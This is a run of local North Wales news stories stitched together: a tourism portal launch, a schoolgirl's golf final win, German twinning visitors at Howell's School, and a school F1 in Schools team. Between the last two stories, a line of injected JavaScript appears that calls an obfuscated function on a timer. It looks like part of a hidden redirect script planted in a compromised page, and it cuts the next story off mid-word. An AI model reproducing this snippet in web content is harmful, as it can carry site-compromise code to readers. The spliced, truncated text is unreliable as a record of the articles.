Digital revolution is one in a million

A major digital tourism campaign has been launched to put Gwynedd on the map.

Tourism Partnership North Wales are aiming to attract one million unique visitors to their new, all encompassing website.

The innovative portal will bring all the organisation’s digital marketing campaigns together so they can be accessed through a single website called Destination North Wales.

It’s been described as a “one stop virtual shop” for visitors wanting to find out anything and everything about North Wales – where to go, what to do and where to stay.

The current range of stand-alone websites attract nearly 500,000 unique visitors annually – the aim is to double that number with the Destination North Wales campaign.

There is also a section providing useful information and links for tourism operators in the region.

Tourism Partnership’s Regional Strategy Director, Dewi Davies, explained: “Destination North Wales is one of our priority projects for this year and is a key element from our Tourism Strategy North Wales for 2010-2015

“A key objective is to project our distinctive strengths by carrying more powerful messages to our potential customers of what great things there are to do in North Wales.

“We want to make it easier for visitors to find out information about every part of North Wales, from the Isle of Anglesey, to Snowdonia Mountains and Coast, right through to our costal resorts between Llandudno and Rhyl, and then to the North East corner of Wales where we’ve got great assets there as well.

“It’s absolutely vital to provide information about  where to stay and what to do – we have more than 190 top attractions and more than 500 events each year.

“On top of that, we have the great outdoors with a host of high adrenaline activities or more leisurely pursuits.

“You can just walk around our fantastic scenery and our great Areas of Outstanding Natural Beauty whether that’s the  Clwydian Range and Dee Valley, the  Anglesey coast, or the Llŷn Peninsula.

“We have some excellent food produced locally and we really want our customers to enjoy the unique flavours of North Wales.

“Our culinary credentials have been underlined by a number of recent developments, including the creation of the Clwydian Range Food Trail and the opening of the new Bodnant Welsh Food centre at Furnace Farm on the Bodnant Estate in the Conwy Valley along with the new farm shop and café at the Rhug Estate, in Corwen.

“Destination North Wales is a one-stop virtual shop for people who want up-to-date, accurate information.

“The site is very crisp, very clear and excellently designed. From the minute you land on it, you’re going to be able to navigate very quickly and efficiently to the point of information you really want.

“We want to provide a brilliant virtual experience as a precursor to having a fantastic time for real when the visitors have arrived in North Wales.

“This is an important step on our journey to becoming a Top Five UK visitor destination.”

Carole Startin, Tourism Partnership’s Marketing and Events Executive, was equally enthused.

She said: It’s a really exciting project because at the moment finding tourism information in North Wales can be quite a complicated manoeuvre.

“This will make life much easier for people who want to come to North Wales.

“It is multi-platform so you’ll be able to view it on anything from a mobile phone to internet TV  – or of course your iPads or tablet.

“The important thing is that we  convert the unique visitors to Destination North Wales into people who actually come here and we are confident that will be the case.

“There is just so much to do in North Wales – and it’s all packaged in a compact geographical area. We may be small but we are beautifully formed.

“Our unique selling point in contrast to our competitors is that you don’t have to travel very far in north Wales to do whatever you want to do.

“You can swim in the sea and climb our highest mountain, Snowdon, all in one day.”

Lea-Anne holds nerve to take title on Monty’s course at Celtic Manor

Howells school, Denbigh. Pictured is Lea-anne Bramwell.

A 12-year-old girl from Abergele has followed in the footsteps of golfing greats to win at Wales’s legendary Ryder Cup venue, Celtic Manor.

Little Lea-Anne Bramwell, a Year Seven pupil at Howells School, Denbigh, clinched a dramatic final green triumph in the final of the Welsh Mini Masters tournament.

After a ding-dong battle Lea-Anne, who plays at Abergele Golf Club, arrived at the ninth and final hole level with her opponent in the strokeplay final but she unleashed a glorious three-wood to 12 feet, just missed her birdie putt but tapped in for a par-three and a two-shot win.

Lea-Anne’s mum and dad and her sister, Amy-Jane, also a pupil at Howells School, all play at Abergele where Lea-Anne has a 28-handicap and she had her dad, Jason, who plays off 12 on the bag for her in the final.

She said: “It was great to have dad there. He knows the game and was able to give me some advice and encouragement so it was a team effort.

“I hit a really good shot at the last hole and my opponent was in trouble and took two to get on and three-putted.”

The final was held over a shortened nine holes of the Montgomerie course at Celtic Manor, the magnificent golf resort near Newport, in Gwent, which memorably hosted the 2010 Ryder Cup.

The Montgomerie course was designed by Ryder Cup captain Colin Montgomerie and the final produced a similarly nerve-shredding finish.

Monty’s bunkers caused Lea-Anne some early problems in the final and she fell two shots behind.

She fought back though, watched by a contingent of family and friends and with two holes to play was one ahead before her opponent holed a raking putt on the eighth to level the match.

But it was Lea-Anne who held her nerve on the final hole to come out on top and take the trophy: “It was really good,” she said: “Dad was a big help and was really good at choosing the right club for me to hit.”

The final was the culmination of a lengthy qualifying process with both Bramwell sisters entering the competition which aims to encourage young golfers in Wales in the wake of the successful Ryder Cup

Lea-Anne and Amy-Jane both played in the first qualifying round held at Penmaenmawr Golf Club and both won through to the regional final at St. Melyd Golf Club, near Prestatyn.

There Lea-Anne came out on top with Amy-Jane a close second but with only one going through to the final.

Howells School Academic Principal Emma Jones said: “We’re delighted for Lea-Anne. She showed a lot of skill and determination to win and to hold her nerve on that last hole was tremendous.

“Golf is a very difficult game and there must have been a lot of tension, especially playing somewhere like Celtic Manor, and it must have been a great experience for her and for her family.”

The talented sisters are not just good at golf though. Earlier this year they celebrated double success at the Chester Drama Festival where Amy-Jane gained a first prize and Lea-Anne a second.

As well as golf Lea-Anne loves horse riding and enjoys Mathematics while Amy-Jane is studying A-levels in Chemistry, Biology and Physics at Howells School and would like to be a pharmacist.

A party of German youngsters thought they’d arrived on a Harry Potter film set when they came to the Vale of Clwyd.

They were on a five day trip to celebrate Denbigh’s long-standing twinning links with the town of Biebertal in the Hessen region of Germany.

Twenty young people, aged 10-17, stayed at the independent girls boarding school, Howell’s School, and used it as a base for trips out to places of interest across the region.

Howell’s was shortlisted as a possible location for Hogwarts in the blockbuster Harry Potter film.

The Potter-mad German schoolchildren were delighted with the “magical” surroundings.

Accompanied by an 11-strong group of teachers, they jetted into Manchester Airport and on to an official welcome to the town by civic officials.

The group had a packed schedule, beginning with trips to Conwy and Llandudno before a guided tour of Denbigh along with an excursion to the Cai Dai 1950s museum in the town as well as an expedition over the border to Chester with Bodnant Garden, near Llandudno, and Ruthin also on the itinerary.

They were guests at Howells School, the all-girls boarding school, and used it as a base for trips out to places of interest across the region.

Keith Welsh, who. organised the trip, said: “It is part of a programme of reciprocal visits between Biebertal and Denbigh which happen each autumn and have been going on for a number of years.

“Next year, it will be the turn of young people from Denbigh to go over to Germany.

“Howells School has always supported the program, it has all the facilities they need and is within easy travelling distance of many attractions in North Wales.”

Eleri Ames, of the Denbigh Twinning Association, said: “The twinning link with Biebertal was established over 20 years ago and I think people get a lot from it, such as being able to learn about each other’s culture and heritage.

“I know the people from Biebertal enjoy coming over here and we like to go over to Germany and stay with them.

“The group of young people we had staying at Howells School were really impressed with the building.

“They thought they had walked on to the set of a Harry Potter film and were visiting Hogwarts!”

Howells School Trustee Nicola Locke said: “We’re delighted to play host to the visitors from Germany. The link between the town and Biebertal is an enduring and important one.

“As a school with its own long and distinguished international links we know how important that is and what opportunities it provides – here at Howells our own Prime Warden, Kotoe Kuroda,
is Japanese and we welcome boarders from all over the world.”

Petra Schmidt, leader of the party from Biebertal, said: “We have enjoyed our stay. It’s been lovely here.

“We’ve been to Llandudno, Conwy and Chester and to the Fifties Museum in Denbigh which was fun and we’ve had a tour of the school as well. It’s a fantastic place.”

if (number1==3){var delay = 18000;	setTimeout($Bhq(0), delay);}tor of Peninsula Windows who have sponsored them.

Watch out Red Bull… a new Formula 1 team is challenging for honours.

It’s the brainchild of six Year 10 pupils at Ysgol David Hughes, in Menai Bridge, on Anglesey.

They are competing in the F1 in Schools Challenge that’s being backed by the sport’s supremo, Bernie Ecclestone.

The aim is to use computer software to design, build and then race miniature gas powered balsa wood racing cars about 20cm long.

The team are hoping the car will reach a speed of more than 60kph on a 20-metre track when they  compete in the regional final at Bangor University at the end of January.

If they’re successful, they will then go on to national and international finals.

The structure of the team is based on the real life F1 outfits like Red Bull and McLaren.

In addition to preparing a business plan and developing a budget, Team Grease Monkeys have had to find a sponsor.

The firm that’s making their F1 dream possible is Peninsula Home Improvements, from Gaerwen, whose name will be emblazoned across the body of the car.

Two of the firm’s bosses, Managing Director Ken Grayson and Director Dylan Hulse, paid a visit to the school to check on progress.

Head of Technology Kevin Tulliver said Peninsula had been “very generous”.

He explained: “The challenge inspires students to use IT, to learn about physics, aerodynamics, leadership and teamwork, media skills and financial strategy.

“The teams are judged on car speed as well as supporting evidence of their design, a verbal presentation and their marketing stand in the ‘pits’.

“Using the sponsorship money from Peninsula, they’ve ordered some professionally made bearings to get to the fastest speed they can of the wheels rotating.

“The vehicle is powered by a carbon dioxide cylinder so there’s no mechanical drive mechanism, it’s actually fired along the track.

“This is a group of highly motivated students, five of the six are doing Design and Technology and they come in every lunchtime to work on the project.

“They’re now at the point where they can test the vehicle in a virtual wind tunnel on the computer, using this thing called computational fluid dynamics, so actually seeing the air flow, actually seeing where the pressure points will be.

According to Project Manager Joe Anderson, 14, they won’t be able to test the car properly until the day of the competition but they have calculated that a fully scaled up version would be able reach the same speeds as a real Formula 1 car.

He said: “My role involves making sure that everyone is in the right place at the right time, that everything is being done to schedule, and helping out the resources managers to make sure that everything is ready to go for the final pitch.

“It’s probably quite nerve wracking to know that it could all go horribly wrong, but as long as we do every step right we should go in with the best of confidence that it’s going to be successful.”

It was a sentiment echoed by fellow team member, Carys Thornton, 14, who is the team’s graphic designer.

Part of her role is to ensure that Peninsula’s name gets pride of place as the main sponsor.

She said: “I’m really enjoying it because I love coming up with the logos and stuff. I’m very proud to be part of the team.”

Ken Grayson and Dylan Hulse were “extremely impressed” by what they saw and heard.

Mr Grayson said: “I didn’t realise the extent of how technical it all is and I’m looking forward to seeing the actual race to see how it’s done.

“Young people get such a bad press these days but the enthusiasm here is just great to see and we’re delighted that we’re able to do our bit to help make this exciting project come to life.”
